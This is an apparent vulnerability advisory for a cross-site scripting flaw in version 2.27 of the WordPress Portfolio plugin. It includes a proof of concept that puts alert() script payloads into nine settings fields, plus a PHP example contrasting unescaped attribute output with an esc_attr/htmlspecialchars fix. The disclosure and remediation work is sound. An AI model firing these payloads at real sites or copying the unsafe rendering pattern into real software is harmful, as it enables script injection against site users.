WordPress Portfolio 2.27 Cross Site Scripting Vulnerability

2015-12-18T00:00:00
ID 1337DAY-ID-24748
Type zdt
Reporter Madhu Akula
Modified 2015-12-18T00:00:00

Description

WordPress Portfolio plugin version 2.27 suffers from a cross site scripting vulnerability.


Plugin Name : Portfolio
 
Affected Version : 2.27 (and most probably lower versions, if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC (Proof of Concept) :
 
Submit the payload shown below in each of the following fields of the plugin's settings page:
 
http://localhost/wp-admin/admin.php?page=portfolio.php
 
tag-slug = "><script>alert(1)</script>
prtfl_date_text_field = "><script>alert(2)</script>
prtfl_link_text_field = "><script>alert(3)</script>
prtfl_shrdescription_text_field = "><script>alert(4)</script>
prtfl_description_text_field = "><script>alert(5)</script>
prtfl_svn_text_field = "><script>alert(6)</script>
prtfl_executor_text_field = "><script>alert(7)</script>
prtfl_screenshot_text_field = "><script>alert(8)</script>
prtfl_technologies_text_field = "><script>alert(9)</script>
 
 
Vulnerable Parameters : tag-slug, prtfl_date_text_field, prtfl_link_text_field, prtfl_shrdescription_text_field, prtfl_description_text_field, prtfl_svn_text_field, prtfl_executor_text_field, prtfl_screenshot_text_field, prtfl_technologies_text_field
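The root cause of this class of bug, shown as an added example that is not code from the advisory or from the Portfolio plugin: a settings value echoed back into a value="" attribute without attribute-context escaping, next to the fixed rendering. The field names are the ones listed above; the two render functions and the request array are constructed for this illustration.

```php
<?php
// The parameters the advisory reports as vulnerable.
const PORTFOLIO_FIELDS = [
    'tag-slug', 'prtfl_date_text_field', 'prtfl_link_text_field',
    'prtfl_shrdescription_text_field', 'prtfl_description_text_field',
    'prtfl_svn_text_field', 'prtfl_executor_text_field',
    'prtfl_screenshot_text_field', 'prtfl_technologies_text_field',
];

// Vulnerable pattern (constructed, not the plugin's code): the submitted value is
// written straight into the value="" attribute, so a double quote closes the
// attribute and everything after it is parsed as markup.
function render_field_unsafe(string $name, string $value): string {
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Fixed pattern: escape for the HTML attribute context at the point of output.
// Inside a WordPress plugin this is esc_attr(); plain PHP's htmlspecialchars()
// with ENT_QUOTES does the equivalent job in this stand-alone script.
function render_field_safe(string $name, string $value): string {
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $esc($name) . '" value="' . $esc($value) . '">';
}

// Constructed request mirroring the PoC above: every field carries the payload.
$request = [];
foreach (PORTFOLIO_FIELDS as $i => $field) {
    $request[$field] = '"><script>alert(' . ($i + 1) . ')</script>';
}

// Only the unsafe rendering contains a live <script> element; the escaped one
// keeps the whole payload inside the attribute as inert text.
foreach (PORTFOLIO_FIELDS as $field) {
    $unsafe = render_field_unsafe($field, $request[$field]);
    $safe   = render_field_safe($field, $request[$field]);
    printf("%-32s unsafe:%s  safe:%s\n", $field,
        str_contains($unsafe, '<script>') ? 'XSS' : 'ok',
        str_contains($safe, '<script>') ? 'XSS' : 'ok');
}
```

Escaping on output is what closes the hole; sanitising on the way in (for example sanitize_text_field() in WordPress) is a useful complement but does not replace it, because stored values can reach other output contexts later.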
 
 
Type of XSS : Reflected / Stored
 
Fixed in : 2.28
 
http://wordpress.org/plugins/portfolio/changelog/

#  0day.today [2018-02-19]  #